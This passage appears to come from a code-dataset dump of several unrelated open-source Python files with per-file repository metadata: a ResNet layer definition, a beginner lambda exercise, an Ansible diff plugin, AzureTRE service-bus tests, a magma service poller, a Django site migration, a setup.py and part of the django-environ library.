srcLayers=['res5c_branch2a'])
# res5c_branch2b layer: 512 channels, 3x3 conv, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='res5c_branch2b',
layer=dict(type='convolution', nFilters=512, width=3, height=3,
stride=1, includebias=False, act='identity'),
srcLayers=['bn5c_branch2a'])
# res5c_branch2b batch norm layer: 512 channels, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='bn5c_branch2b',
layer=dict(type='batchnorm', act='relu'),
srcLayers=['res5c_branch2b'])
# res5c_branch2c layer: 2048 channels, 1x1 conv, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='res5c_branch2c',
layer=dict(type='convolution', nFilters=2048, width=1, height=1,
stride=1, includebias=False, act='identity'),
srcLayers=['bn5c_branch2b'])
# res5c_branch2c batch norm layer: 2048 channels, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='bn5c_branch2c',
layer=dict(type='batchnorm', act='identity'),
srcLayers=['res5c_branch2c'])
# res5c residual layer: 2048 channels, output = 7 x 7
s.deepLearn.addLayer(model=model_table_opts, name='res5c',
layer=dict(type='residual', act='relu'),
srcLayers=['bn5c_branch2c', 'res5b'])
# ------------------- final layers ----------------------
# pool5 layer: 2048 channels, 7x7 pooling, output = 1 x 1
kernel_width = width // 2 // 2 // 2 // 2 // 2
kernel_height = height // 2 // 2 // 2 // 2 // 2
stride = kernel_width
s.deepLearn.addLayer(model=model_table_opts, name='pool5',
layer=dict(type='pooling', width=kernel_width,
height=kernel_height, stride=stride, pool='mean'),
srcLayers=['res5c'])
# fc1000 output layer: 1000 neurons */
s.deepLearn.addLayer(model=model_table_opts, name='fc1000',
layer=dict(type='output', n=1000, act='softmax'),
srcLayers=['pool5'])
return s.CASTable(**model_table_opts)
| 55.251381 | 99 | 0.576505 |
acdfa8c47463c3b2c434f4964162307a1fa0dc50 | 194 | py | Python | ExerciciosPYTHON/NovPython/018.py | Samuel-Melo890/Python-Desafios | 2abc7734d6a6c1f5ab67421f792d6889d93bac94 | [
"MIT"
] | null | null | null | ExerciciosPYTHON/NovPython/018.py | Samuel-Melo890/Python-Desafios | 2abc7734d6a6c1f5ab67421f792d6889d93bac94 | [
"MIT"
] | 2 | 2022-03-18T16:06:07.000Z | 2022-03-18T16:55:29.000Z | ExerciciosPYTHON/NovPython/018.py | Samuel-Melo890/Python-Desafios | 2abc7734d6a6c1f5ab67421f792d6889d93bac94 | [
"MIT"
] | null | null | null | from os import system
system('cls')
print('='*8,'Minha Primeira Função Lambda','='*8)
function = lambda str: print(str)
function('Minha Primeira Função Lambda')
function('Deus me abençoe!')
| 17.636364 | 49 | 0.71134 |
acdfa9c3f107eff69ba51844595a3857f2c040aa | 3,286 | py | Python | venv/lib/python3.6/site-packages/ansible_collections/ansible/utils/plugins/sub_plugins/fact_diff/native.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 1 | 2020-01-22T13:11:23.000Z | 2020-01-22T13:11:23.000Z | venv/lib/python3.6/site-packages/ansible_collections/ansible/utils/plugins/sub_plugins/fact_diff/native.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | 12 | 2020-02-21T07:24:52.000Z | 2020-04-14T09:54:32.000Z | venv/lib/python3.6/site-packages/ansible_collections/ansible/utils/plugins/sub_plugins/fact_diff/native.py | usegalaxy-no/usegalaxy | 75dad095769fe918eb39677f2c887e681a747f3a | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2020 Red Hat
# GNU General Public License v3.0+
# (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = """
author: Bradley Thornton (@cidrblock)
name: native
short_description: Define configurable options for C(native) sub-plugin of M(ansible.utils.fact_diff) module
description:
- This plugin documentation provides the configurable options that can be passed
to the I(ansible.utils.fact_diff) plugins when I(ansible.utils.native) is used as a value for
I(name) option of the module.
version_added: 1.0.0
"""
EXAMPLES = r"""
- name: Show the difference in json format
ansible.utils.fact_diff:
before: "{{ before }}"
after: "{{ after }}"
plugin:
name: ansible.utils.native
"""
import re
from ansible.plugins.callback import CallbackBase
from ansible_collections.ansible.utils.plugins.plugin_utils.base.fact_diff import (
FactDiffBase,
)
class FactDiff(FactDiffBase):
def _check_valid_regexes(self):
if self._skip_lines:
self._debug("Checking regex in 'split_lines' for validity")
for idx, regex in enumerate(self._skip_lines):
try:
self._skip_lines[idx] = re.compile(regex)
except re.error as exc:
msg = "The regex '{regex}', is not valid. The error was {err}.".format(
regex=regex, err=str(exc)
)
self._errors.append(msg)
def _xform(self):
if self._skip_lines:
if isinstance(self._before, str):
self._debug("'before' is a string, splitting lines")
self._before = self._before.splitlines()
if isinstance(self._after, str):
self._debug("'after' is a string, splitting lines")
self._after = self._after.splitlines()
self._before = [
line
for line in self._before
if not any(
regex.match(str(line)) for regex in self._skip_lines
)
]
self._after = [
line
for line in self._after
if not any(
regex.match(str(line)) for regex in self._skip_lines
)
]
if isinstance(self._before, list):
self._debug("'before' is a list, joining with \n")
self._before = "\n".join(map(str, self._before)) + "\n"
if isinstance(self._after, list):
self._debug("'after' is a list, joining with \n")
self._after = "\n".join(map(str, self._after)) + "\n"
def diff(self):
self._after = self._task_args["after"]
self._before = self._task_args["before"]
self._errors = []
self._skip_lines = self._task_args["plugin"]["vars"].get("skip_lines")
self._check_valid_regexes()
if self._errors:
return {"errors": " ".join(self._errors)}
self._xform()
diff = CallbackBase()._get_diff(
{"before": self._before, "after": self._after}
)
return {"diff": diff}
| 35.717391 | 112 | 0.578819 |
acdfaa8ccbd69f34480facf855d753f311da655a | 11,687 | py | Python | api_app/tests_ma/test_service_bus/test_deployment_status_update.py | damoodamoo/AzureTRE | 375c8e3ba94e27ed2a77009bf47453737e6d1d4c | [
"MIT"
] | null | null | null | api_app/tests_ma/test_service_bus/test_deployment_status_update.py | damoodamoo/AzureTRE | 375c8e3ba94e27ed2a77009bf47453737e6d1d4c | [
"MIT"
] | 1 | 2022-02-02T14:52:06.000Z | 2022-02-02T15:00:01.000Z | api_app/tests_ma/test_service_bus/test_deployment_status_update.py | damoodamoo/AzureTRE | 375c8e3ba94e27ed2a77009bf47453737e6d1d4c | [
"MIT"
] | null | null | null | import json
import pytest
import uuid
from mock import AsyncMock, patch
from db.errors import EntityDoesNotExist
from models.domain.workspace import Workspace
from models.domain.operation import Operation, Status
from resources import strings
from service_bus.deployment_status_update import receive_message_and_update_deployment
pytestmark = pytest.mark.asyncio
test_data = [
'bad',
'{"good": "json", "bad": "message"}'
]
OPERATION_ID = "0000c8e7-5c42-4fcb-a7fd-294cfc27aa76"
test_sb_message = {
"operationId": OPERATION_ID,
"id": "59b5c8e7-5c42-4fcb-a7fd-294cfc27aa76",
"status": Status.Deployed,
"message": "test message"
}
test_sb_message_with_outputs = {
"operationId": OPERATION_ID,
"id": "59b5c8e7-5c42-4fcb-a7fd-294cfc27aa76",
"status": Status.Deployed,
"message": "test message",
"outputs": [
{"Name": "name1", "Value": "value1", "Type": "type1"},
{"Name": "name2", "Value": "\"value2\"", "Type": "type2"}
]
}
class ServiceBusReceivedMessageMock:
def __init__(self, message: dict):
self.message = json.dumps(message)
self.correlation_id = "test_correlation_id"
def __str__(self):
return self.message
def create_sample_workspace_object(workspace_id):
return Workspace(
id=workspace_id,
templateName="tre-workspace-base",
templateVersion="0.1.0",
properties={},
resourcePath="test"
)
def create_sample_operation(resource_id):
return Operation(
id=OPERATION_ID,
resourceId=resource_id,
resourcePath=f'/workspaces/{resource_id}',
resourceVersion=0,
message="test"
)
@pytest.mark.parametrize("payload", test_data)
@patch('logging.error')
@patch('service_bus.deployment_status_update.ServiceBusClient')
@patch('fastapi.FastAPI')
async def test_receiving_bad_json_logs_error(app, sb_client, logging_mock, payload):
service_bus_received_message_mock = ServiceBusReceivedMessageMock(payload)
sb_client().get_queue_receiver().receive_messages = AsyncMock(return_value=[service_bus_received_message_mock])
sb_client().get_queue_receiver().complete_message = AsyncMock()
await receive_message_and_update_deployment(app)
error_message = logging_mock.call_args.args[0]
assert error_message.startswith(strings.DEPLOYMENT_STATUS_MESSAGE_FORMAT_INCORRECT)
sb_client().get_queue_receiver().complete_message.assert_called_once_with(service_bus_received_message_mock)
@patch('service_bus.deployment_status_update.OperationRepository')
@patch('service_bus.deployment_status_update.ResourceRepository')
@patch('logging.error')
@patch('service_bus.deployment_status_update.ServiceBusClient')
@patch('fastapi.FastAPI')
async def test_receiving_good_message(app, sb_client, logging_mock, repo, _):
service_bus_received_message_mock = ServiceBusReceivedMessageMock(test_sb_message)
sb_client().get_queue_receiver().receive_messages = AsyncMock(return_value=[service_bus_received_message_mock])
sb_client().get_queue_receiver().complete_message = AsyncMock()
expected_workspace = create_sample_workspace_object(test_sb_message["id"])
repo().get_resource_dict_by_id.return_value = expected_workspace.dict()
await receive_message_and_update_deployment(app)
repo().get_resource_dict_by_id.assert_called_once_with(uuid.UUID(test_sb_message["id"]))
repo().update_item_dict.assert_called_once_with(expected_workspace.dict())
logging_mock.assert_not_called()
sb_client().get_queue_receiver().complete_message.assert_called_once_with(service_bus_received_message_mock)
@patch('service_bus.deployment_status_update.OperationRepository')
@patch('service_bus.deployment_status_update.ResourceRepository')
@patch('logging.error')
@patch('service_bus.deployment_status_update.ServiceBusClient')
@patch('fastapi.FastAPI')
async def test_when_updating_non_existent_workspace_error_is_logged(app, sb_client, logging_mock, repo, _):
service_bus_received_message_mock = ServiceBusReceivedMessageMock(test_sb_message)
sb_client().get_queue_receiver().receive_messages = AsyncMock(return_value=[service_bus_received_message_mock])
sb_client().get_queue_receiver().complete_message = AsyncMock()
repo().get_resource_dict_by_id.side_effect = EntityDoesNotExist
await receive_message_and_update_deployment(app)
expected_error_message = strings.DEPLOYMENT_STATUS_ID_NOT_FOUND.format(test_sb_message["id"])
logging_mock.assert_called_once_with(expected_error_message)
sb_client().get_queue_receiver().complete_message.assert_called_once_with(service_bus_received_message_mock)
@patch('service_bus.deployment_status_update.OperationRepository')
@patch('service_bus.deployment_status_update.ResourceRepository')
@patch('logging.error')
@patch('service_bus.deployment_status_update.ServiceBusClient')
@patch('fastapi.FastAPI')
async def test_when_updating_and_state_store_exception(app, sb_client, logging_mock, repo, _):
service_bus_received_message_mock = ServiceBusReceivedMessageMock(test_sb_message)
sb_client().get_queue_receiver().receive_messages = AsyncMock(return_value=[service_bus_received_message_mock])
sb_client().get_queue_receiver().complete_message = AsyncMock()
repo().get_resource_dict_by_id.side_effect = Exception
await receive_message_and_update_deployment(app)
logging_mock.assert_called_once_with(strings.STATE_STORE_ENDPOINT_NOT_RESPONDING + " ")
sb_client().get_queue_receiver().complete_message.assert_not_called()
@patch('service_bus.deployment_status_update.OperationRepository')
@patch('service_bus.deployment_status_update.ResourceRepository')
@patch('logging.error')
@patch('service_bus.deployment_status_update.ServiceBusClient')
@patch('fastapi.FastAPI')
async def test_state_transitions_from_deployed_to_deploying_does_not_transition(app, sb_client, logging_mock, repo, _):
updated_message = test_sb_message
updated_message["status"] = Status.Deploying
service_bus_received_message_mock = ServiceBusReceivedMessageMock(updated_message)
sb_client().get_queue_receiver().receive_messages = AsyncMock(return_value=[service_bus_received_message_mock])
sb_client().get_queue_receiver().complete_message = AsyncMock()
expected_workspace = create_sample_workspace_object(test_sb_message["id"])
repo().get_resource_dict_by_id.return_value = expected_workspace.dict()
await receive_message_and_update_deployment(app)
repo().update_item_dict.assert_called_once_with(expected_workspace.dict())
@patch('service_bus.deployment_status_update.OperationRepository')
@patch('service_bus.deployment_status_update.ResourceRepository')
@patch('logging.error')
@patch('service_bus.deployment_status_update.ServiceBusClient')
@patch('fastapi.FastAPI')
async def test_state_transitions_from_deployed_to_deleted(app, sb_client, logging_mock, repo, operations_repo_mock):
updated_message = test_sb_message
updated_message["status"] = Status.Deleted
updated_message["message"] = "Has been deleted"
service_bus_received_message_mock = ServiceBusReceivedMessageMock(updated_message)
sb_client().get_queue_receiver().receive_messages = AsyncMock(return_value=[service_bus_received_message_mock])
sb_client().get_queue_receiver().complete_message = AsyncMock()
workspace = create_sample_workspace_object(test_sb_message["id"])
repo().get_resource_dict_by_id.return_value = workspace.dict()
operation = create_sample_operation(workspace.id)
operations_repo_mock().get_operation_by_id.return_value = operation
expected_operation = create_sample_operation(workspace.id)
expected_operation.status = Status.Deleted
expected_operation.message = updated_message["message"]
await receive_message_and_update_deployment(app)
operations_repo_mock().update_operation_status.assert_called_once_with(expected_operation.id, expected_operation.status, expected_operation.message)
@patch('service_bus.deployment_status_update.OperationRepository')
@patch('service_bus.deployment_status_update.ResourceRepository')
@patch('logging.error')
@patch('service_bus.deployment_status_update.ServiceBusClient')
@patch('fastapi.FastAPI')
async def test_state_transitions_from_deployed_to_delete_failed(app, sb_client, logging_mock, repo, operations_repo_mock):
updated_message = test_sb_message
updated_message["status"] = Status.Deleting
updated_message["message"] = "Is being deleted"
service_bus_received_message_mock = ServiceBusReceivedMessageMock(updated_message)
sb_client().get_queue_receiver().receive_messages = AsyncMock(return_value=[service_bus_received_message_mock])
sb_client().get_queue_receiver().complete_message = AsyncMock()
workspace = create_sample_workspace_object(test_sb_message["id"])
repo().get_resource_dict_by_id.return_value = workspace.dict()
operation = create_sample_operation(workspace.id)
operations_repo_mock().get_operation_by_id.return_value = operation
expected_operation = create_sample_operation(workspace.id)
expected_operation.status = Status.Deleting
expected_operation.message = updated_message["message"]
await receive_message_and_update_deployment(app)
operations_repo_mock().update_operation_status.assert_called_once_with(expected_operation.id, expected_operation.status, expected_operation.message)
@patch('service_bus.deployment_status_update.OperationRepository')
@patch('service_bus.deployment_status_update.ResourceRepository')
@patch('logging.error')
@patch('service_bus.deployment_status_update.ServiceBusClient')
@patch('fastapi.FastAPI')
async def test_outputs_are_added_to_resource_item(app, sb_client, logging_mock, repo, _):
received_message = test_sb_message_with_outputs
received_message["status"] = Status.Deployed
service_bus_received_message_mock = ServiceBusReceivedMessageMock(received_message)
sb_client().get_queue_receiver().receive_messages = AsyncMock(return_value=[service_bus_received_message_mock])
sb_client().get_queue_receiver().complete_message = AsyncMock()
resource = create_sample_workspace_object(received_message["id"])
resource.properties = {"exitingName": "exitingValue"}
repo().get_resource_dict_by_id.return_value = resource.dict()
new_params = {"name1": "value1", "name2": "value2"}
expected_resource = resource
expected_resource.properties = {**resource.properties, **new_params}
await receive_message_and_update_deployment(app)
repo().update_item_dict.assert_called_once_with(expected_resource.dict())
@patch('service_bus.deployment_status_update.OperationRepository')
@patch('service_bus.deployment_status_update.ResourceRepository')
@patch('logging.error')
@patch('service_bus.deployment_status_update.ServiceBusClient')
@patch('fastapi.FastAPI')
async def test_properties_dont_change_with_no_outputs(app, sb_client, logging_mock, repo, _):
received_message = test_sb_message
received_message["status"] = Status.Deployed
service_bus_received_message_mock = ServiceBusReceivedMessageMock(received_message)
sb_client().get_queue_receiver().receive_messages = AsyncMock(return_value=[service_bus_received_message_mock])
sb_client().get_queue_receiver().complete_message = AsyncMock()
resource = create_sample_workspace_object(received_message["id"])
resource.properties = {"exitingName": "exitingValue"}
repo().get_resource_dict_by_id.return_value = resource.dict()
expected_resource = resource
await receive_message_and_update_deployment(app)
repo().update_item_dict.assert_called_once_with(expected_resource.dict())
| 42.653285 | 152 | 0.802344 |
acdfad464d35f70652d1be3ec5ca3cdb2c01bb76 | 5,446 | py | Python | orc8r/gateway/python/magma/magmad/service_poller.py | remo5000/magma | 1d1dd9a23800a8e07b1ce016776d93e12430ec15 | [
"BSD-3-Clause"
] | 2 | 2020-11-05T18:58:26.000Z | 2021-02-09T06:42:49.000Z | orc8r/gateway/python/magma/magmad/service_poller.py | remo5000/magma | 1d1dd9a23800a8e07b1ce016776d93e12430ec15 | [
"BSD-3-Clause"
] | 14 | 2019-11-15T12:01:18.000Z | 2019-12-12T14:37:42.000Z | orc8r/gateway/python/magma/magmad/service_poller.py | 119Vik/magma-1 | 107a7b374466a837fc0a49b283ba9d6ff1d702e3 | [
"BSD-3-Clause"
] | 3 | 2020-08-20T18:45:34.000Z | 2020-08-20T20:18:42.000Z | """
Copyright (c) 2016-present, Facebook, Inc.
All rights reserved.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree. An additional grant
of patent rights can be found in the PATENTS file in the same directory.
"""
import logging
import time
from typing import List
import grpc
from magma.common.job import Job
from magma.common.rpc_utils import grpc_async_wrapper
from magma.common.service_registry import ServiceRegistry
from magma.magmad.metrics import UNEXPECTED_SERVICE_RESTARTS
from orc8r.protos.common_pb2 import Void
from orc8r.protos.service303_pb2_grpc import Service303Stub
class ServiceInfo(object):
"""
Stores info about the individual services
"""
# Time buffer for services to restart, in seconds
SERVICE_RESTART_BUFFER_TIME = 30
def __init__(self, service_name):
self._service_name = service_name
self._expected_start_time = time.time()
self._status = None
self._linked_services = []
# Initialize the counter for each service
UNEXPECTED_SERVICE_RESTARTS.labels(
service_name=self._service_name).inc(0)
@property
def status(self):
return self._status
@property
def linked_services(self):
return self._linked_services
def add_linked_services(self, service_list):
for service in service_list:
if service != self._service_name and \
service not in self._linked_services:
self._linked_services.append(service)
def update(self, start_time, status):
self._status = status
if start_time <= self._expected_start_time:
# Probably a race in service starts, or magmad restarted
return
if (start_time - self._expected_start_time >
self.SERVICE_RESTART_BUFFER_TIME):
UNEXPECTED_SERVICE_RESTARTS.labels(
service_name=self._service_name).inc()
self._expected_start_time = start_time
def process_service_restart(self):
self._expected_start_time = time.time()
class ServicePoller(Job):
"""
Periodically query the services' Service303 interface
"""
# Periodicity for getting status from other services, in seconds
GET_STATUS_INTERVAL = 10
# Timeout when getting status from other local services, in seconds
GET_STATUS_TIMEOUT = 8
def __init__(self, loop, config, dynamic_services: List[str]):
super().__init__(
interval=self.GET_STATUS_INTERVAL,
loop=loop
)
self._config = config
# Holds a map of service name -> ServiceInfo
self._service_info = {}
for service in config['magma_services']:
self._service_info[service] = ServiceInfo(service)
for service in dynamic_services:
self._service_info[service] = ServiceInfo(service)
for service_list in config.get('linked_services', []):
for service in service_list:
self._service_info[service].add_linked_services(service_list)
def update_dynamic_services(self,
new_services: List[str],
stopped_services: List[str]):
"""
Update the service poller when dynamic services are enabled or disabled
Args:
new_services: New services which were enabled
stopped_services: Old services which were disabled
"""
for service in new_services:
self._service_info[service] = ServiceInfo(service)
for service in stopped_services:
self._service_info.pop(service)
@property
def service_info(self):
return self._service_info
def process_service_restart(self, service_name):
self._service_info[service_name].process_service_restart()
for linked_service in self._service_info[service_name].linked_services:
self._service_info[linked_service].process_service_restart()
async def _run(self):
await self._get_service_info()
async def _get_service_info(self):
"""
Make RPC calls to 'GetServiceInfo' functions of other services, to
get current status.
"""
for service in self._service_info:
# Check whether service provides service303 interface
if service in self._config['non_service303_services']:
continue
try:
chan = ServiceRegistry.get_rpc_channel(
service, ServiceRegistry.LOCAL)
except ValueError:
# Service can't be contacted
logging.error('Cant get RPC channel to %s', service)
continue
client = Service303Stub(chan)
try:
future = client.GetServiceInfo.future(
Void(),
self.GET_STATUS_TIMEOUT,
)
info = await grpc_async_wrapper(future, self._loop)
self._service_info[service].update(info.start_time_secs,
info.status)
except grpc.RpcError as err:
logging.error(
"GetServiceInfo Error for %s! [%s] %s",
service,
err.code(),
err.details(),
)
| 35.594771 | 79 | 0.632942 |
acdfae776d0fa7ec88c9682ef01e8282f214f801 | 61 | py | Python | ds/processing/__init__.py | jordanparker6/datascience-starter | 3eef1640a45d19431e9fb26adf5e089d3708dab1 | [
"MIT"
] | 4 | 2020-10-01T23:20:29.000Z | 2021-06-24T08:34:41.000Z | ds/processing/__init__.py | jordanparker6/datascience-starter | 3eef1640a45d19431e9fb26adf5e089d3708dab1 | [
"MIT"
] | null | null | null | ds/processing/__init__.py | jordanparker6/datascience-starter | 3eef1640a45d19431e9fb26adf5e089d3708dab1 | [
"MIT"
] | null | null | null | from .base import ProcessorPipeline
from .processors import * | 30.5 | 35 | 0.836066 |
acdfaeec627996f58568de31339323b95e718264 | 1,020 | py | Python | product_listing_demo/contrib/sites/migrations/0003_set_site_domain_and_name.py | NyntoFive/product_listing_demo | 7398c526d666090a2309a6df63c8aa613050123f | [
"MIT"
] | null | null | null | product_listing_demo/contrib/sites/migrations/0003_set_site_domain_and_name.py | NyntoFive/product_listing_demo | 7398c526d666090a2309a6df63c8aa613050123f | [
"MIT"
] | null | null | null | product_listing_demo/contrib/sites/migrations/0003_set_site_domain_and_name.py | NyntoFive/product_listing_demo | 7398c526d666090a2309a6df63c8aa613050123f | [
"MIT"
] | null | null | null | """
To understand why this file is here, please read:
http://cookiecutter-django.readthedocs.io/en/latest/faq.html#why-is-there-a-django-contrib-sites-directory-in-cookiecutter-django
"""
from django.conf import settings
from django.db import migrations
def update_site_forward(apps, schema_editor):
"""Set site domain and name."""
Site = apps.get_model("sites", "Site")
Site.objects.update_or_create(
id=settings.SITE_ID,
defaults={
"domain": "nyntofive.com",
"name": "Product Listing Demo",
},
)
def update_site_backward(apps, schema_editor):
"""Revert site domain and name to default."""
Site = apps.get_model("sites", "Site")
Site.objects.update_or_create(
id=settings.SITE_ID, defaults={"domain": "example.com", "name": "example.com"}
)
class Migration(migrations.Migration):
dependencies = [("sites", "0002_alter_domain_unique")]
operations = [migrations.RunPython(update_site_forward, update_site_backward)]
| 29.142857 | 129 | 0.688235 |
acdfaf6fb3ff53fafa7a9701c521c8b074c22d56 | 509 | py | Python | setup.py | Ottomossei/mikit | 3f76eb9b726eb2f98e1188a1e863c965854c1aab | [
"MIT"
] | 2 | 2021-01-09T09:04:01.000Z | 2021-01-09T09:04:26.000Z | setup.py | Ottomossei/mikit | 3f76eb9b726eb2f98e1188a1e863c965854c1aab | [
"MIT"
] | null | null | null | setup.py | Ottomossei/mikit | 3f76eb9b726eb2f98e1188a1e863c965854c1aab | [
"MIT"
] | null | null | null | from setuptools import setup, find_packages
with open('requirements.txt') as requirements_file:
install_requirements = requirements_file.read().splitlines()
setup(
name="mikit",
version="1.0.0",
description="Chemical formula-based materials informatics kit",
author="Ottomossei",
author_email="seki.jobhunting@gmail.com",
install_requires=install_requirements,
url='https://github.com/Ottomossei/mikit/',
license=license,
packages=find_packages(exclude=['example'])
) | 31.8125 | 67 | 0.738703 |
acdfb153060eea2b99661361608f30036f0288ac | 32,336 | py | Python | environ/environ.py | KyleKaniecki/django-environ | 44ac6649ad6135ff4246371880298bf732cd1c52 | [
"MIT"
] | 2,518 | 2015-01-09T03:30:05.000Z | 2022-03-30T12:52:05.000Z | environ/environ.py | KyleKaniecki/django-environ | 44ac6649ad6135ff4246371880298bf732cd1c52 | [
"MIT"
] | 334 | 2015-01-02T13:03:41.000Z | 2022-03-16T09:13:40.000Z | environ/environ.py | KyleKaniecki/django-environ | 44ac6649ad6135ff4246371880298bf732cd1c52 | [
"MIT"
] | 327 | 2015-01-02T12:59:05.000Z | 2022-03-31T15:39:27.000Z | # This file is part of the django-environ.
#
# Copyright (c) 2021, Serghei Iakovlev <egrep@protonmail.ch>
# Copyright (c) 2013-2021, Daniele Faraglia <daniele.faraglia@gmail.com>
#
# For the full copyright and license information, please view
# the LICENSE.txt file that was distributed with this source code.
"""
Django-environ allows you to utilize 12factor inspired environment
variables to configure your Django application.
"""
import ast
import logging
import os
import re
import sys
import urllib.parse as urlparselib
import warnings
from urllib.parse import (
parse_qs,
ParseResult,
unquote_plus,
urlparse,
urlunparse,
)
from .compat import (
DJANGO_POSTGRES,
ImproperlyConfigured,
json,
PYMEMCACHE_DRIVER,
REDIS_DRIVER,
)
from .fileaware_mapping import FileAwareMapping
try:
from os import PathLike
except ImportError: # Python 3.5 support
from pathlib import PurePath as PathLike
Openable = (str, PathLike)
logger = logging.getLogger(__name__)
def _cast(value):
# Safely evaluate an expression node or a string containing a Python
# literal or container display.
# https://docs.python.org/3/library/ast.html#ast.literal_eval
try:
return ast.literal_eval(value)
except (ValueError, SyntaxError):
return value
def _cast_int(v):
"""Return int if possible."""
return int(v) if hasattr(v, 'isdigit') and v.isdigit() else v
def _cast_urlstr(v):
return unquote_plus(v) if isinstance(v, str) else v
class NoValue:
def __repr__(self):
return '<{}>'.format(self.__class__.__name__)
class Env:
"""Provide scheme-based lookups of environment variables so that each
caller doesn't have to pass in `cast` and `default` parameters.
Usage:::
env = Env(MAIL_ENABLED=bool, SMTP_LOGIN=(str, 'DEFAULT'))
if env('MAIL_ENABLED'):
...
"""
ENVIRON = os.environ
NOTSET = NoValue()
BOOLEAN_TRUE_STRINGS = ('true', 'on', 'ok', 'y', 'yes', '1')
URL_CLASS = ParseResult
POSTGRES_FAMILY = ['postgres', 'postgresql', 'psql', 'pgsql', 'postgis']
ELASTICSEARCH_FAMILY = ['elasticsearch' + x for x in ['', '2', '5', '7']]
DEFAULT_DATABASE_ENV = 'DATABASE_URL'
DB_SCHEMES = {
'postgres': DJANGO_POSTGRES,
'postgresql': DJANGO_POSTGRES,
'psql': DJANGO_POSTGRES,
'pgsql': DJANGO_POSTGRES,
'postgis': 'django.contrib.gis.db.backends.postgis',
'mysql': 'django.db.backends.mysql',
'mysql2': 'django.db.backends.mysql',
'mysql-connector': 'mysql.connector.django',
'mysqlgis': 'django.contrib.gis.db.backends.mysql',
'mssql': 'sql_server.pyodbc',
'oracle': 'django.db.backends.oracle',
'pyodbc': 'sql_server.pyodbc',
'redshift': 'django_redshift_backend',
'spatialite': 'django.contrib.gis.db.backends.spatialite',
'sqlite': 'django.db.backends.sqlite3',
'ldap': 'ldapdb.backends.ldap',
}
_DB_BASE_OPTIONS = [
'CONN_MAX_AGE',
'ATOMIC_REQUESTS',
'AUTOCOMMIT',
'DISABLE_SERVER_SIDE_CURSORS',
]
DEFAULT_CACHE_ENV = 'CACHE_URL'
CACHE_SCHEMES = {
'dbcache': 'django.core.cache.backends.db.DatabaseCache',
'dummycache': 'django.core.cache.backends.dummy.DummyCache',
'filecache': 'django.core.cache.backends.filebased.FileBasedCache',
'locmemcache': 'django.core.cache.backends.locmem.LocMemCache',
'memcache': 'django.core.cache.backends.memcached.MemcachedCache',
'pymemcache': PYMEMCACHE_DRIVER,
'pylibmc': 'django.core.cache.backends.memcached.PyLibMCCache',
'rediscache': REDIS_DRIVER,
'redis': REDIS_DRIVER,
'rediss': REDIS_DRIVER,
}
_CACHE_BASE_OPTIONS = [
'TIMEOUT',
'KEY_PREFIX',
'VERSION',
'KEY_FUNCTION',
'BINARY',
]
DEFAULT_EMAIL_ENV = 'EMAIL_URL'
EMAIL_SCHEMES = {
'smtp': 'django.core.mail.backends.smtp.EmailBackend',
'smtps': 'django.core.mail.backends.smtp.EmailBackend',
'smtp+tls': 'django.core.mail.backends.smtp.EmailBackend',
'smtp+ssl': 'django.core.mail.backends.smtp.EmailBackend',
'consolemail': 'django.core.mail.backends.console.EmailBackend',
'filemail': 'django.core.mail.backends.filebased.EmailBackend',
'memorymail': 'django.core.mail.backends.locmem.EmailBackend',
'dummymail': 'django.core.mail.backends.dummy.EmailBackend'
}
_EMAIL_BASE_OPTIONS = ['EMAIL_USE_TLS', 'EMAIL_USE_SSL']
DEFAULT_SEARCH_ENV = 'SEARCH_URL'
SEARCH_SCHEMES = {
"elasticsearch": "haystack.backends.elasticsearch_backend."
"ElasticsearchSearchEngine",
"elasticsearch2": "haystack.backends.elasticsearch2_backend."
"Elasticsearch2SearchEngine",
"elasticsearch5": "haystack.backends.elasticsearch5_backend."
"Elasticsearch5SearchEngine",
"elasticsearch7": "haystack.backends.elasticsearch7_backend."
"Elasticsearch7SearchEngine",
"solr": "haystack.backends.solr_backend.SolrEngine",
"whoosh": "haystack.backends.whoosh_backend.WhooshEngine",
"xapian": "haystack.backends.xapian_backend.XapianEngine",
"simple": "haystack.backends.simple_backend.SimpleEngine",
}
CLOUDSQL = 'cloudsql'
def __init__(self, **scheme):
self.smart_cast = True
self.escape_proxy = False
self.scheme = scheme
def __call__(self, var, cast=None, default=NOTSET, parse_default=False):
return self.get_value(
var,
cast=cast,
default=default,
parse_default=parse_default
)
def __contains__(self, var):
return var in self.ENVIRON
# Shortcuts
def str(self, var, default=NOTSET, multiline=False):
"""
:rtype: str
"""
value = self.get_value(var, cast=str, default=default)
if multiline:
return re.sub(r'(\\r)?\\n', r'\n', value)
return value
def unicode(self, var, default=NOTSET):
"""Helper for python2
:rtype: unicode
"""
return self.get_value(var, cast=str, default=default)
def bytes(self, var, default=NOTSET, encoding='utf8'):
"""
:rtype: bytes
"""
value = self.get_value(var, cast=str, default=default)
if hasattr(value, 'encode'):
return value.encode(encoding)
return value
def bool(self, var, default=NOTSET):
"""
:rtype: bool
"""
return self.get_value(var, cast=bool, default=default)
def int(self, var, default=NOTSET):
"""
:rtype: int
"""
return self.get_value(var, cast=int, default=default)
def float(self, var, default=NOTSET):
"""
:rtype: float
"""
return self.get_value(var, cast=float, default=default)
def json(self, var, default=NOTSET):
"""
:returns: Json parsed
"""
return self.get_value(var, cast=json.loads, default=default)
def list(self, var, cast=None, default=NOTSET):
"""
:rtype: list
"""
return self.get_value(
var,
cast=list if not cast else [cast],
default=default
)
def tuple(self, var, cast=None, default=NOTSET):
"""
:rtype: tuple
"""
return self.get_value(
var,
cast=tuple if not cast else (cast,),
default=default
)
def dict(self, var, cast=dict, default=NOTSET):
"""
:rtype: dict
"""
return self.get_value(var, cast=cast, default=default)
def url(self, var, default=NOTSET):
"""
:rtype: urlparse.ParseResult
"""
return self.get_value(
var,
cast=urlparse,
default=default,
parse_default=True
)
def db_url(self, var=DEFAULT_DATABASE_ENV, default=NOTSET, engine=None):
"""Returns a config dictionary, defaulting to DATABASE_URL.
The db method is an alias for db_url.
:rtype: dict
"""
return self.db_url_config(
self.get_value(var, default=default),
